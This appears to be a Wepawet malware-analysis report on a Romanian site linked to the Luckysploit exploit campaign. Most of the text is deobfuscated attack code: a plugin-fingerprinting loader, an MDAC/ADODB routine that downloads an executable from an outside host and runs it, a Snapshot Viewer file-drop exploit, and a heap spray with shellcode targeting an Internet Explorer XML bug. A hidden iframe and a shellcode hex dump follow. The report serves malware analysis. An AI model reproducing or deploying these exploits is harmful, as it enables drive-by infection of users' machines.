Wepawet (alpha)

Analysis report for http://www.referate.com.ro

Sample Overview

Detection results

This resource appears to be involved in the Luckysploit malware campaign.

Exploits

Deobfuscation results

Evals

• new ActiveXObject('ShockwaveFlash.ShockwaveFlash.15');
  

  (repeated 1 time)

• PEELt6.ShellExecute(Frogxa);
  

  (repeated 1 time)

• function UYO(a, b){
    ci = "";
    for (i = 0; i < b; i ++ ){
      var d = Math.floor(Math.random() * a.length);
      ci += a.substring(d, d + 1)
    }
    return ci
  }
  XXV = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
  function hexToString(d){
    a = "";
    b = 0;
    c = 1;
    for (i = 0; i < d.length; i ++ ){
      if (d.charAt(i) == "=" || d.charAt(i) == "\n")break ;
      b = b * 64 + XXV.indexOf(d.charAt(i));
      c = (c == 1 ? 64 : c/4);if(c!=64){a+=String.fromCharCode(parseInt(b/c));
      b %= c
    }
  }
  return a
  }
  oil = 0;
  function GCL(a, b){
  k = "";
  if (isNaN(oil)){
    k = oil;
    oil = 0
  }
  s = new Array();
  k += a;
  a = k;
  for (i = oil; i < 256; i ++ )s[i] = i;
  j = oil;
  for (i = oil; i < 256; i ++ ){
    j = (j + s[i] + a.charCodeAt(i % a.length)) % 256;
    x = s[i];
    s[i] = s[j];
    s[j] = x
  }
  i = oil;
  j = oil;
  c = "";
  for (y = 0; y < b.length; y ++ ){
    i = (i + 1) % 256;
    j = (j + s[i]) % 256;
    x = s[i];
    s[i] = s[j];
    s[j] = x;
    c += String.fromCharCode(b.charCodeAt(y) ^ s[(s[i] + s[j]) % 256])
  }
  return c
  }
  function rc4Decrypt(a, b){
  return GCL(a, b)
  }
  PTH = ((0xdeadbeefcafe & 0xffffff) == 0xefcafe);
  function A(a, b, c){
  if (a != null)if ("number" == typeof a)this .fromNumber(a, b, c);
  else if (b == null && "string" != typeof a)this .CQR(a, 256);
  else this .CQR(a, b)
  }
  function nbi(){
  return new A(null)
  }
  function XPP(i, x, w, j, c, n){
  while ( -- n >= 0){
    var v = x * this [i ++ ] + w[j] + c;
    c = Math.floor(v
  /0x4000000);w[j++]=v&0x3ffffff}return c}function BLP(i,x,w,j,c,n){var a=x&0x7fff,xh=x>>15;
  while(--n>=0){var l=this[i]&0x7fff;var h=this[i++]>>15;var m=xh*l+h*a;l=a*l+((m&0x7fff)<<1
  5)+w[j]+(c&0x3fffffff);c=(l>>>30)+(m>>>15)+xh*h+(c>>>30);w[j++]=l&0x3fffffff}return c}func
  tion SUR(i,x,w,j,c,n){var a=x&0x3fff,xh=x>>14;while(--n>=0){var l=this[i]&0x3fff;var h=thi
  s[i++]>>14;var m=xh*l+h*a;l=a*l+((m&0x3fff)<<14)+w[j]+c;c=(l>>28)+(m>>14)+xh*h;w[j++]=l&0x
  fffffff}return c}if(PTH&&(navigator.appName=="Microsoft Internet Explorer")){A.prototype.a
  m=BLP;B=30}else if(PTH&&(navigator.appName!="Netscape")){A.prototype.am=XPP;B=26}else{A.pr
  ototype.am=SUR;B=28}A.prototype.DB=B;A.prototype.DM=((1<<B)-1);A.prototype.DV=(1<<B);var B
  I_FP=52;A.prototype.FV=Math.pow(2,BI_FP);A.prototype.F1=BI_FP-B;A.prototype.F2=2*B-BI_FP;v
  ar QWU="0123456789abcdefghijklmnopqrstuvwxyz";var QMS=new Array();var rr,vv;rr="0".charCod
  eAt(0);for(vv=0;vv<=9;++vv)QMS[rr++]=vv;rr="a".charCodeAt(0);for(vv=10;vv<36;++vv)QMS[rr++
  ]=vv;rr="A".charCodeAt(0);for(vv=10;vv<36;++vv)QMS[rr++]=vv;function HNV(n){return QWU.cha
  rAt(n)}function QGJ(s,i){var c=QMS[s.charCodeAt(i)];return(c==null)?-1:c}function FBE(r){f
  or(var i=this.t-1;i>=0;--i)r[i]=this[i];r.t=this.t;r.s=this.s}function JXQ(x){this.t=1;thi
  s.s=(x<0)?-1:0;if(x>0)this[0]=x;else if(x<-1)this[0]=x+DV;else this.t=0}function nbv(i){va
  r r=nbi();r.GOV(i);return r}function QNW(s,b){var k;if(b==16)k=4;else if(b==8)k=3;else if(
  b==256)k=8;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else{this.fromRadix(s,b);re
  turn}this.t=0;this.s=0;var i=s.length,mi=false,sh=0;while(--i>=0){var x=(k==8)?s[i]&0xff:Q
  GJ(s,i);if(x<0){if(s.charAt(i)=="-")mi=true;continue}mi=false;if(sh==0)this[this.t++]=x;el
  se if(sh+k>this.DB){this[this.t-1]|=(x&((1<<(this.DB-sh))-1))<<sh;this[this.t++]=(x>>(this
  .DB-sh))}else this[this.t-1]|=x<<sh;sh+=k;if(sh>=this.DB)sh-=this.DB}if(k==8&&(s[0]&0x80)!
  =0){this.s=-1;if(sh>0)this[this.t-1]|=((1<<(this.DB-sh))-1)<<sh}this.PLU();if(mi)A.PLM.OJD
  (this,this)}function VQI(){var c=this.s&this.DM;while(this.t>0&&this[this.t-1]==c)--this.t
  }function PZS(b){if(this.s<0)return"-"+this.OJC().PCR(b);var k;if(b==16)k=4;else if(b==8)k
  =3;else if(b==2)k=1;else if(b==32)k=5;else if(b==4)k=2;else return this.toRadix(b);var a=(
  1<<k)-1,d,m=false,r="",i=this.t;var p=this.DB-(i*this.DB)%k;if(i-->0){if(p<this.DB&&(d=thi
  s[i]>>p)>0){m=true;r=HNV(d)}while(i>=0){if(p<k){d=(this[i]&((1<<p)-1))<<(k-p);d|=this[--i]
  >>(p+=this.DB-k)}else{d=(this[i]>>(p-=k))&a;if(p<=0){p+=this.DB;--i}}if(d>0)m=true;if(m)r+
  =HNV(d)}}return m?r:"0"}function GWC(){var r=nbi();A.PLM.OJD(this,r);return r}function QZJ
  (){return(this.s<0)?this.OJC():this}function LLN(a){var r=this.s-a.s;if(r!=0)return r;var 
  i=this.t;r=i-a.t;if(r!=0)return r;while(--i>=0)if((r=this[i]-a[i])!=0)return r;return 0}fu
  nction DKI(x){var r=1,t;if((t=x>>>16)!=0){x=t;r+=16}if((t=x>>8)!=0){x=t;r+=8}if((t=x>>4)!=
  0){x=t;r+=4}if((t=x>>2)!=0){x=t;r+=2}if((t=x>>1)!=0){x=t;r+=1}return r}function QLV(){if(t
  his.t<=0)return 0;return this.DB*(this.t-1)+DKI(this[this.t-1]^(this.s&this.DM))}function 
  YNJ(n,r){var i;for(i=this.t-1;i>=0;--i)r[i+n]=this[i];for(i=n-1;i>=0;--i)r[i]=0;r.t=this.t
  +n;r.s=this.s}function JWK(n,r){for(var i=n;i<this.t;++i)r[i-n]=this[i];r.t=Math.max(this.
  t-n,0);r.s=this.s}function DTJ(n,r){var a=n%this.DB;var b=this.DB-a;var d=(1<<b)-1;var e=M
  ath.floor(n/this .DB), c = (this .s << a) & this .DM, i;
    for (i = this .t - 1; i >= 0 ;-- i){
      r[i + e + 1] = (this [i] >> b) | c;
      c = (this [i] & d) << a
    }
    for (i = e - 1; i >= 0 ;-- i)r[i] = 0;
    r[e] = c;
    r.t = this .t + e + 1;
    r.s = this .s;
    r.PLU()
  }
  function PRQ(n, r){
    r.s = this .s;
    var a = Math.floor(n
  /this.DB);if(a>=this.t){r.t=0;return}var b=n%this.DB;var c=this.DB-b;var d=(1<<b)-1;r[0]=t
  his[a]>>b;for(var i=a+1;i<this.t;++i){r[i-a-1]|=(this[i]&d)<<c;r[i-a]=this[i]>>b}if(b>0)r[
  this.t-a-1]|=(this.s&d)<<c;r.t=this.t-a;r.PLU()}function NHW(a,r){var i=0,c=0,m=Math.min(a
  .t,this.t);while(i<m){c+=this[i]-a[i];r[i++]=c&this.DM;c>>=this.DB}if(a.t<this.t){c-=a.s;w
  hile(i<this.t){c+=this[i];r[i++]=c&this.DM;c>>=this.DB}c+=this.s}else{c+=this.s;while(i<a.
  t){c-=a[i];r[i++]=c&this.DM;c>>=this.DB}c-=a.s}r.s=(c<0)?-1:0;if(c<-1)r[i++]=this.DV+c;els
  e if(c>0)r[i++]=c;r.t=i;r.PLU()}function LCD(a,r){var x=this.abs(),y=a.abs();var i=x.t;r.t
  =i+y.t;while(--i>=0)r[i]=0;for(i=0;i<y.t;++i)r[i+x.t]=x.am(0,y[i],r,i,0,x.t);r.s=0;r.PLU()
  ;if(this.s!=a.s)A.PLM.OJD(r,r)}function WVH(r){var x=this.abs();var i=r.t=2*x.t;while(--i>
  =0)r[i]=0;for(i=0;i<x.t-1;++i){var c=x.am(i,x[i],r,2*i,0,1);if((r[i+x.t]+=x.am(i+1,2*x[i],
  r,2*i+1,c,x.t-i-1))>=x.DV){r[i+x.t]-=x.DV;r[i+x.t+1]=1}}if(r.t>0)r[r.t-1]+=x.am(i,x[i],r,2
  *i,0,1);r.s=0;r.PLU()}function LCC(m,q,r){var a=m.abs();if(a.t<=0)return;var b=this.abs();
  if(b.t<a.t){if(q!=null)q.GOV(0);if(r!=null)this.WCO(r);return}if(r==null)r=nbi();var y=nbi
  (),ts=this.s,ms=m.s;var c=this.DB-DKI(a[a.t-1]);if(c>0){a.XND(c,y);b.XND(c,r)}else{a.WCO(y
  );b.WCO(r)}var d=y.t;var f=y[d-1];if(f==0)return;var g=f*(1<<this.F1)+((d>1)?y[d-2]>>this.
  F2:0);var h=this.FV/g, d2 = (1 << this .F1) / g, e = 1 << this .F2;
    var i = r.t, j = i - d, t = (q == null) ? nbi() : q;
    y.CHN(j, t);
    if (r.FBC(t) >= 0){
      r[r.t ++ ] = 1;
      r.OJD(t, r)
    }
    A.ONE.CHN(d, t);
    t.OJD(y, y);
    while (y.t < d)y[y.t ++ ] = 0;
    while ( -- j >= 0){
      var k = (r[ -- i] == f) ? this .DM : Math.floor(r[i] * h + (r[i - 1] + e) * d2);
      if ((r[i] += y.am(0, k, r, j, 0, d)) < k){
        y.CHN(j, t);
        r.OJD(t, r);
        while (r[i] <-- k)r.OJD(t, r)
      }
    }
    if (q != null){
      r.DTB(d, q);
      if (ts != ms)A.PLM.OJD(q, q)
    }
    r.t = d;
    r.PLU();
    if (c > 0)r.IYO(c, r);
    if (ts < 0)A.PLM.OJD(r, r)
  }
  function PIF(a){
    var r = nbi();
    this .abs().MLJ(a, null, r);
    if (this .s < 0 && r.FBC(A.PLM) > 0)a.OJD(r, r);
    return r
  }
  function EHQ(m){
    this .m = m
  }
  function VTS(x){
    if (x.s < 0 || x.FBC(this .m) >= 0)return x.mod(this .m);
    else return x
  }
  function QBD(x){
    return x
  }
  function LEC(x){
    x.MLJ(this .m, null, x)
  }
  function GYY(x, y, r){
    x.HNS(y, r);
    this .DBN(r)
  }
  function QLD(x, r){
    x.TKJ(r);
    this .DBN(r)
  }
  EHQ.prototype.DLU = VTS;
  EHQ.prototype.LIR = QBD;
  EHQ.prototype.DBN = LEC;
  EHQ.prototype.ZCX = GYY;
  EHQ.prototype.DVU = QLD;
  function YRS(){
    if (this .t < 1)return 0;
    var x = this [0];
    if ((x & 1) == 0)return 0;
    var y = x & 3;
    y = (y * (2 - (x & 0xf) * y)) & 0xf;
    y = (y * (2 - (x & 0xff) * y)) & 0xff;
    y = (y * (2 - (((x & 0xffff) * y) & 0xffff))) & 0xffff;
    y = (y * (2 - x * y % this .DV)) % this .DV;
    return (y > 0) ? this .DV - y :- y
  }
  function JQJ(m){
    this .m = m;
    this .mp = m.WUD();
    this .mpl = this .mp & 0x7fff;
    this .mph = this .mp >> 15;
    this .um = (1 << (m.DB - 15)) - 1;
    this .mt2 = 2 * m.t
  }
  function UKY(x){
    var r = nbi();
    x.abs().CHN(this .m.t, r);
    r.MLJ(this .m, null, r);
    if (x.s < 0 && r.FBC(A.PLM) > 0)this .m.OJD(r, r);
    return r
  }
  function UPF(x){
    var r = nbi();
    x.WCO(r);
    this .DBN(r);
    return r
  }
  function HFC(x){
    while (x.t <= this .mt2)x[x.t ++ ] = 0;
    for (var i = 0; i < this .m.t ;++ i){
      var j = x[i] & 0x7fff;
      var a = (j * this .mpl + (((j * this .mph + (x[i] >> 15) * this .mpl) & this .um) << 
      15)) & x.DM;
      j = i + this .m.t;
      x[j] += this .m.am(0, a, x, i, 0, this .m.t);
      while (x[j] >= x.DV){
        x[j] -= x.DV;
        x[ ++ j] ++ 
      }
    }
    x.PLU();
    x.DTB(this .m.t, x);
    if (x.FBC(this .m) >= 0)x.OJD(this .m, x)
  }
  function GQM(x, r){
    x.TKJ(r);
    this .DBN(r)
  }
  function SIZ(x, y, r){
    x.HNS(y, r);
    this .DBN(r)
  }
  JQJ.prototype.DLU = UKY;
  JQJ.prototype.LIR = UPF;
  JQJ.prototype.DBN = HFC;
  JQJ.prototype.ZCX = SIZ;
  JQJ.prototype.DVU = GQM;
  function SHI(){
    return ((this .t > 0) ? (this [0] & 1) : this .s) == 0
  }
  function WJX(e, z){
    if (e > 0xffffffff || e < 1)return A.ONE;
    var r = nbi(), r2 = nbi(), g = z.DLU(this ), i = DKI(e) - 1;
    g.WCO(r);
    while ( -- i >= 0){
      z.DVU(r, r2);
      if ((e & (1 << i)) > 0)z.ZCX(r2, g, r);
      else {
        var t = r;
        r = r2;
        r2 = t
      }
    }
    return z.LIR(r)
  }
  function FWN(e, m){
    var z;
    if (e < 256 || m.NPN())z = new EHQ(m);
    else z = new JQJ(m);
    return this .exp(e, z)
  }
  A.prototype.WCO = FBE;
  A.prototype.GOV = JXQ;
  A.prototype.CQR = QNW;
  A.prototype.PLU = VQI;
  A.prototype.CHN = YNJ;
  A.prototype.DTB = JWK;
  A.prototype.XND = DTJ;
  A.prototype.IYO = PRQ;
  A.prototype.OJD = NHW;
  A.prototype.HNS = LCD;
  A.prototype.TKJ = WVH;
  A.prototype.MLJ = LCC;
  A.prototype.WUD = YRS;
  A.prototype.NPN = SHI;
  A.prototype.exp = WJX;
  A.prototype.PCR = PZS;
  A.prototype.OJC = GWC;
  A.prototype.abs = QZJ;
  A.prototype.FBC = LLN;
  A.prototype.USL = QLV;
  A.prototype.mod = PIF;
  A.prototype.ZDM = FWN;
  A.PLM = nbv(0);
  A.ONE = nbv(1);
  function FEZ(){
    this .i = 0;
    this .j = 0;
    this .S = new Array()
  }
  function VTC(a){
    var i, j, t;
    for (i = 0; i < 256 ;++ i)this .S[i] = i;
    j = 0;
    for (i = 0; i < 256 ;++ i){
      j = (j + this .S[i] + a[i % a.length]) & 255;
      t = this .S[i];
      this .S[i] = this .S[j];
      this .S[j] = t
    }
    this .i = 0;
    this .j = 0
  }
  function BYT(){
    var t;
    this .i = (this .i + 1) & 255;
    this .j = (this .j + this .S[this .i]) & 255;
    t = this .S[this .i];
    this .S[this .i] = this .S[this .j];
    this .S[this .j] = t;
    return this .S[(t + this .S[this .i]) & 255]
  }
  FEZ.prototype.init = VTC;
  FEZ.prototype.next = BYT;
  function XVO(){
    return new FEZ()
  }
  var IRC = 256;
  var GQN;
  var FBL;
  var MPG;
  function JSY(x){
    FBL[MPG ++ ] ^= x & 255;
    FBL[MPG ++ ] ^= (x >> 8) & 255;
    FBL[MPG ++ ] ^= (x >> 16) & 255;
    FBL[MPG ++ ] ^= (x >> 24) & 255;
    if (MPG >= IRC)MPG -= IRC
  }
  function HXE(){
    JSY(new Date().getTime())
  }
  if (FBL == null){
    FBL = new Array();
    MPG = 0;
    var t;
    if (navigator.appName == "Netscape" && navigator.appVersion < "5" && window.crypto){
      var z = window.crypto.random(32);
      for (t = 0; t < z.length ;++ t)FBL[MPG ++ ] = z.charCodeAt(t) & 255
    }
    while (MPG < IRC){
      t = Math.floor(65536 * Math.random());
      FBL[MPG ++ ] = t >>> 8;
      FBL[MPG ++ ] = t & 255
    }
    MPG = 0;
    HXE()
  }
  function TNV(){
    if (GQN == null){
      HXE();
      GQN = XVO();
      GQN.init(FBL);
      for (MPG = 0; MPG < FBL.length ;++ MPG)FBL[MPG] = 0;
      MPG = 0
    }
    return GQN.next()
  }
  function TNVs(a){
    var i;
    for (i = 0; i < a.length ;++ i)a[i] = TNV()
  }
  function FNC(){
  }
  FNC.prototype.KXM = TNVs;
  function ZFY(a, r){
    return new A(a, r)
  }
  function GGK(s, n){
    var a = "";
    var i = 0;
    while (i + n < s.length){
      a += s.substring(i, i + n) + "\n";
      i += n
    }
    return a + s.substring(i, s.length)
  }
  function ZQL(b){
    if (b < 0x10)return "0" + b.PCR(16);
    else return b.PCR(16)
  }
  function DJS(s, n){
    if (n < s.length + 11){
      return null
    }
    var a = new Array();
    var i = s.length - 1;
    while (i >= 0 && n > 0)a[ -- n] = s.charCodeAt(i -- );
    a[ -- n] = 0;
    var b = new FNC();
    var x = new Array();
    while (n > 2){
      x[0] = 0;
      while (x[0] == 0)b.KXM(x);
      a[ -- n] = x[0]
    }
    a[ -- n] = 2;
    a[ -- n] = 0;
    return new A(a)
  }
  function RSAKey(){
    this .n = null;
    this .e = 0;
    this .d = null;
    this .p = null;
    this .q = null;
    this .QNF = null;
    this .BLB = null;
    this .VVV = null
  }
  function BLQ(N, E){
    if (N != null && E != null && N.length > 0 && E.length > 0){
      this .n = ZFY(N, 16);
      this .e = parseInt(E, 16)
    }
  }
  function XBG(x){
    return x.ZDM(this .e, this .n)
  }
  function JMJ(a){
    if (oil > 1){
      oil = UYO(XXV, 53);
      a = ci
    }
    ;
    var m = DJS(a, (this .n.USL() + 7) >> 3);
    if (m == null)return null;
    var c = this .doPublic(m);
    if (c == null)return null;
    var h = c.PCR(16);
    if ((h.length & 1) == 0)return h;
    else return "0" + h
  }
  RSAKey.prototype.doPublic = XBG;
  RSAKey.prototype.setPublic = BLQ;
  RSAKey.prototype.encrypt = JMJ;
  sss = "";
  for (oil = 0; oil < 53; oil ++ )sss += String.fromCharCode(Math.floor(75 + Math.sin(oil) * 
  21));
  rsa = new RSAKey();
  rsa.setPublic("
  9d46e7aff313fee4f7b4053f792f4e06ad573578c1e027aff6e6b0a830549c52eda0388be4bca6728246566bf1
  583152736e0fc2e008f612d0c0b90627328ddb", "10001");
  res = rsa.encrypt(sss);
  nextkey = res;
  var scriptTag = document.createElement("script");
  scriptTag.src = "?" + res;
  document.body.appendChild(scriptTag);
  

  (repeated 1 time)

• rc4Decrypt
  

  (repeated 2 times)

• nextkey = '';
  k = '';
  vers = new Array();
  function check_flash_vuln(){
    /**/e4flash;
    try {
      /**/Flashver = '';
      /**/Flashver = (new ActiveXObject('ShockwaveFlash.ShockwaveFlash.9')).GetVariable('$' + 
      'version');
      var flash_re =/ ([0 - 9, ] + )/;
      Flashver = flash_re.exec(Flashver)[1];
      Flashver = Flashver.split(',');
    }
    catch (e4flash){
    }
    if (e4flash != '[object Error]'){
      flash_real_ver = Flashver[0] + ':' + Flashver[1] + ':' + Flashver[2];
      return flash_real_ver;
    }
    return 0;
  }
  try {
    vers.push('f', check_flash_vuln());
  }
  catch (e){
  }
  function check_pdf_vuln(){
    /**/WlHmRwck = new Array(0, 0, 0);
    /**/DWhq4qTe = eval('null');
    /**/epdf;
    try {
      DWhq4qTe = new ActiveXObject('AcroPDF.PDF')
    }
    catch (epdf){
    }
    if (!DWhq4qTe){
      try {
        DWhq4qTe = new ActiveXObject('PDF.PdfCtrl')
      }
      catch (/**/ej8889793ff){
      }
    }
    if (DWhq4qTe){
      /**/FPUkcU5N = DWhq4qTe['GetVersions']()['split'](',');
      snum =- 1;
      try {
        for (index_pdf = 0; index_pdf < FPUkcU5N.length; index_pdf ++ )if (FPUkcU5N[
        index_pdf].indexOf('Script') !=- 1)snum = index_pdf;
      }
      catch (e){
      }
      if (snum ==- 1)snum = 0;
      FPUkcU5N = FPUkcU5N[snum]['split']('=')['toString']();
      FPUkcU5N = FPUkcU5N.replace(new RegExp('[^0-9]+', 'g'), '');
      WlHmRwck[0] = FPUkcU5N['charAt'](0);
      WlHmRwck[1] = FPUkcU5N['charAt'](1);
      WlHmRwck[2] = FPUkcU5N['charAt'](2);
      return WlHmRwck[0] + WlHmRwck[1] + WlHmRwck[2];
    }
    return 0
  }
  try {
    vers.push('p', check_pdf_vuln());
  }
  catch (e){
  }
  res2 = 'versions=' + vers;
  res2 = rsa.encrypt(res2);
  nextkey = 'versions=' + vers + res2;
  var scriptTag2 = document.createElement('script');
  scriptTag2.src = '?' + res2;
  document.body.appendChild(scriptTag2);
  

  (repeated 1 time)

• null
  

  (repeated 1 time)

• nextkey = '';
  k = '';
  attack_level = 0;
  

  (repeated 1 time)

Writes

• <script type='text/javascript' src='http://netwindows.ro/adnet/www/delivery/ajs.php
  

  (repeated 4 times)

•  ? zoneid = 1679
  

  (repeated 3 times)

•  & amp;
  cb = 68241738715
  

  (repeated 1 time)

•  & amp;
  loc = http % 3A//www.referate.com.ro
  

  (repeated 3 times)

• ' ></ script > 
  

  (repeated 4 times)

•  ? zoneid = 1680
  

  (repeated 1 time)

•  & cb = 68986274655
  

  (repeated 1 time)

•  & loc = http % 3A//www.referate.com.ro
  

  (repeated 1 time)

•  & amp;
  cb = 47135302922
  

  (repeated 1 time)

•  & amp;
  cb = 85634348335
  

  (repeated 1 time)

• <script type="text/javascript" src="http://95.129.144.229/stats/stats.js"></script>
  

  (repeated 2 times)

• <iframe src="http://95.129.144.229/1" WIDTH="0%" HEIGHT="0%" style="hidden" MARGINHEIGHT="0" 
  MARGINWIDTH="0" SCROLLING="no" frameborder="0" NORESIZE></iframe>
  

  (repeated 2 times)

• <script type="text/javascript" src=
  "http://ts.trafic.ro/js/trafic.js?tk=9130691356856244&t_rid=referatecom1"></script>
  

  (repeated 1 time)

• <a href="http://www.trafic.ro/?rid=referatecom1" target=_blank><img src=
  "http://ts1.trafic.ro/cgi-bin/trafic.png?rid=referatecom1&rn=636223901174&rk=-2116634210-871536012-3
  71107825-653198934&cc=default&c=24&w=1024&j=0&f=15&b=52&os=12&d=http%3A//www.referate.com.ro&dn=refe
  rate.com.ro&r=&p=&o=r&se=&vid=aalcb93b97ac09bd3d27ee00d3dcdc2b&fst=1241053650&lst=1241053650&cst=124
  1053650&vn=1&vl=0&s=0" width=88 height=31 border=0 alt=
  "Trafic.ro - clasamente si statistici pentru site-urile romanesti"></a>
  

  (repeated 1 time)

• <SCRIPT language="javascript">var p_url = "http://gukgifoc.cn/nuc/exe.php";
  function MDAC(){
    var nuc = '';
    d8 = 0;
    var nn8IkFI = document.createElement("ob" + nuc + "jec" + nuc + "t");
    nn8IkFI.setAttribute("id", "<?" + nuc + "=" + nuc + "nn8I" + nuc + "kFI?>");
    nn8IkFI.setAttribute("clas" + nuc + "sid", "clsid:BD" + nuc + "96C556-65A3-1" + nuc + 
    "1D0-983A-0" + nuc + "0C04FC29E36");
    try {
      var O0wwnEwI = nn8IkFI.CreateObject("adodb" + nuc + "." + nuc + "st" + nuc + "r" + nuc
       + "eam", '');
      var d8 = 1;
    }
    catch (e){
    }
    try {
      var PEELt6 = nn8IkFI.CreateObject("Sh" + nuc + "el" + nuc + "l" + nuc + ".A" + nuc + 
      "p" + nuc + "plica" + nuc + "tion", '');
      var d8 = 1;
    }
    catch (e){
    }
    if (d8 == 1){
      try {
        var MuUapmz = nn8IkFI.CreateObject("m" + nuc + "sx" + nuc + "ml2.XM" + nuc + "LHTTP"
        , '');
        MuUapmz.open("G" + nuc + "ET", p_url, false);
        MuUapmz.send();
        O0wwnEwI.type = 1;
        O0wwnEwI.open();
        O0wwnEwI.Write(MuUapmz.responseBody);
        Frogxa = "..\\S87ekhV.exe";
        O0wwnEwI.SaveToFile(Frogxa, 2);
        eval("PEEL" + nuc + "t" + nuc + "6.She" + nuc + "llExe" + nuc + "c" + nuc + "ute(F" + 
        nuc + "rogxa)" + nuc + ";");
        return 1;
      }
      catch (e){
      }
    }
  }
  function PDF(){
    try {
      ret = new ActiveXObject("AcroPDF.PDF");
      document.write('<iframe src="spl/pdf.pdf" width=1 height=1></iframe>');
    }
    catch (e){
    }
  }
  function SS(){
    try {
      ret = new ActiveXObject("snpvw.Snapshot Viewer Control.1");
      var arbitrary_file = p_url;
      var dest = 'C:/Program Files/Outlook Express/wab.exe';
      document.write(
      "<object classid='clsid:F0E42D60-368C-11D0-AD81-00A0C90DC8D9' id='attack'></object>");
      attack.SnapshotPath = arbitrary_file;
      setTimeout('window.location = "ldap://127.0.0.1"', 2000);
      attack.CompressedPath = dest;
      attack.PrintSnapshot(arbitrary_file, dest);
    }
    catch (e){
    }
  }
  function WML(){
    document.write('<div id="replace">x</div>');
    var srtkod = unescape("%u4343%u4343%u0feb%u335b%u66c9%u80b9%u8001%uef33" + "
  %ue243%uebfa%ue805%uffec%uffff%u8b7f%udf4e%uefef%u64ef%ue3af%u9f64%u42f3%u9f64%u6ee7%uef03
  %uefeb" + "
  %u64ef%ub903%u6187%ue1a1%u0703%uef11%uefef%uaa66%ub9eb%u7787%u6511%u07e1%uef1f%uefef%uaa66
  %ub9e7" + "
  %uca87%u105f%u072d%uef0d%uefef%uaa66%ub9e3%u0087%u0f21%u078f%uef3b%uefef%uaa66%ub9ff%u2e87
  %u0a96" + "
  %u0757%uef29%uefef%uaa66%uaffb%ud76f%u9a2c%u6615%uf7aa%ue806%uefee%ub1ef%u9a66%u64cb%uebaa
  %uee85" + "
  %u64b6%uf7ba%u07b9%uef64%uefef%u87bf%uf5d9%u9fc0%u7807%uefef%u66ef%uf3aa%u2a64%u2f6c%u66bf
  %ucfaa" + "
  %u1087%uefef%ubfef%uaa64%u85fb%ub6ed%uba64%u07f7%uef8e%uefef%uaaec%u28cf%ub3ef%uc191%u288a
  %uebaf" + "
  %u8a97%uefef%u9a10%u64cf%ue3aa%uee85%u64b6%uf7ba%uaf07%uefef%u85ef%ub7e8%uaaec%udccb%ubc34
  %u10bc" + "
  %ucf9a%ubcbf%uaa64%u85f3%ub6ea%uba64%u07f7%uefcc%uefef%uef85%u9a10%u64cf%ue7aa%ued85%u64b6
  %uf7ba" + "
  %uff07%uefef%u85ef%u6410%uffaa%uee85%u64b6%uf7ba%uef07%uefef%uaeef%ubdb4%u0eec%u0eec%u0eec
  %u0eec" + "
  %u036c%ub5eb%u64bc%u0d35%ubd18%u0f10%u64ba%u6403%ue792%ub264%ub9e3%u9c64%u64d3%uf19b%uec97
  %ub91c" + "
  %u9964%ueccf%udc1c%ua626%u42ae%u2cec%udcb9%ue019%uff51%u1dd5%ue79b%u212e%uece2%uaf1d%u1e04
  %u11d4" + "
  %u9ab1%ub50a%u0464%ub564%ueccb%u8932%ue364%u64a4%uf3b5%u32ec%ueb64%uec64%ub12a%u2db2%uefe7
  %u1b07" + "
  %u1011%uba10%ua3bd%ua0a2%uefa1%u7468%u7074%u2F3A%u672F%u6B75%u6967%u6F66%u2E63%u6E63%u6E2F
  %u6375%u652F%u6578%u702E%u7068");
    var psrayt = unescape("%u0a0a%u0a0a");
    do {
      psrayt += psrayt;
    }
    while (psrayt.length < 0xd0000);
    meray = new Array();
    for (i = 0; i < 100; i ++ )meray[i] = psrayt + srtkod;
    xmlcode = "
  <XML ID=I><X><C><![CDATA[<image SRC=http://&#x0a0a;&#x0a0a;.example.com>]]></C></X></XML><
  SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DAT
  AFORMATAS=HTML></SPAN></SPAN>";
    tag = document.getElementById("replace");
    tag.innerHTML = xmlcode;
  }
  if (MDAC() || PDF() || WML() || SS()){
  }
  </script>
  
  

  (repeated 1 time)

Network Activity

Requests

Redirects

ActiveX controls

• BD96C556-65A3-11D0-983A-00C04FC29E36
  	Name	Arg0	Arg1	Count
  Methods	CreateObject	msxml2.XMLHTTP	''	1
  		Shell.Application	''	1
  		adodb.stream	''	1
  	Name	Value		Count
  Attributes	id	<?=nn8IkFI?>		1

• ADODB.STREAM
  	Name	Arg0	Arg1	Count
  Methods	Write	(undefined)		1
  	SaveToFile	..\S87ekhV.exe	2.0	1
  	open			1
  	Name	Value		Count
  Attributes	type	1.0		1

• SHELL.APPLICATION
  	Name	Arg0	Count
  Methods	ShellExecute	..\S87ekhV.exe	1

• MSXML2.XMLHTTP
  	Name	Arg0	Arg1	Arg2	Count
  Methods	open	GET	http://gukgifoc.cn/nuc/exe.php	false	1
  	send				1

• ShockwaveFlash.ShockwaveFlash.15
  No attribute setting or method call detected

Shellcode and Malware

43 43 43 43 eb 0f 5b 33  c9 66 b9 80 01 80 33 ef 
43 e2 fa eb 05 e8 ec ff  ff ff 7f 8b 4e df ef ef 
ef 64 af e3 64 9f f3 42  64 9f e7 6e 03 ef eb ef 
ef 64 03 b9 87 61 a1 e1  03 07 11 ef ef ef 66 aa 
eb b9 87 77 11 65 e1 07  1f ef ef ef 66 aa e7 b9 
87 ca 5f 10 2d 07 0d ef  ef ef 66 aa e3 b9 87 00 
21 0f 8f 07 3b ef ef ef  66 aa ff b9 87 2e 96 0a 
57 07 29 ef ef ef 66 aa  fb af 6f d7 2c 9a 15 66 
aa f7 06 e8 ee ef ef b1  66 9a cb 64 aa eb 85 ee 
b6 64 ba f7 b9 07 64 ef  ef ef bf 87 d9 f5 c0 9f 
07 78 ef ef ef 66 aa f3  64 2a 6c 2f bf 66 aa cf 
87 10 ef ef ef bf 64 aa  fb 85 ed b6 64 ba f7 07 
8e ef ef ef ec aa cf 28  ef b3 91 c1 8a 28 af eb 
97 8a ef ef 10 9a cf 64  aa e3 85 ee b6 64 ba f7 
07 af ef ef ef 85 e8 b7  ec aa cb dc 34 bc bc 10 
9a cf bf bc 64 aa f3 85  ea b6 64 ba f7 07 cc ef 
ef ef 85 ef 10 9a cf 64  aa e7 85 ed b6 64 ba f7 
07 ff ef ef ef 85 10 64  aa ff 85 ee b6 64 ba f7 
07 ef ef ef ef ae b4 bd  ec 0e ec 0e ec 0e ec 0e 
6c 03 eb b5 bc 64 35 0d  18 bd 10 0f ba 64 03 64 
92 e7 64 b2 e3 b9 64 9c  d3 64 9b f1 97 ec 1c b9 
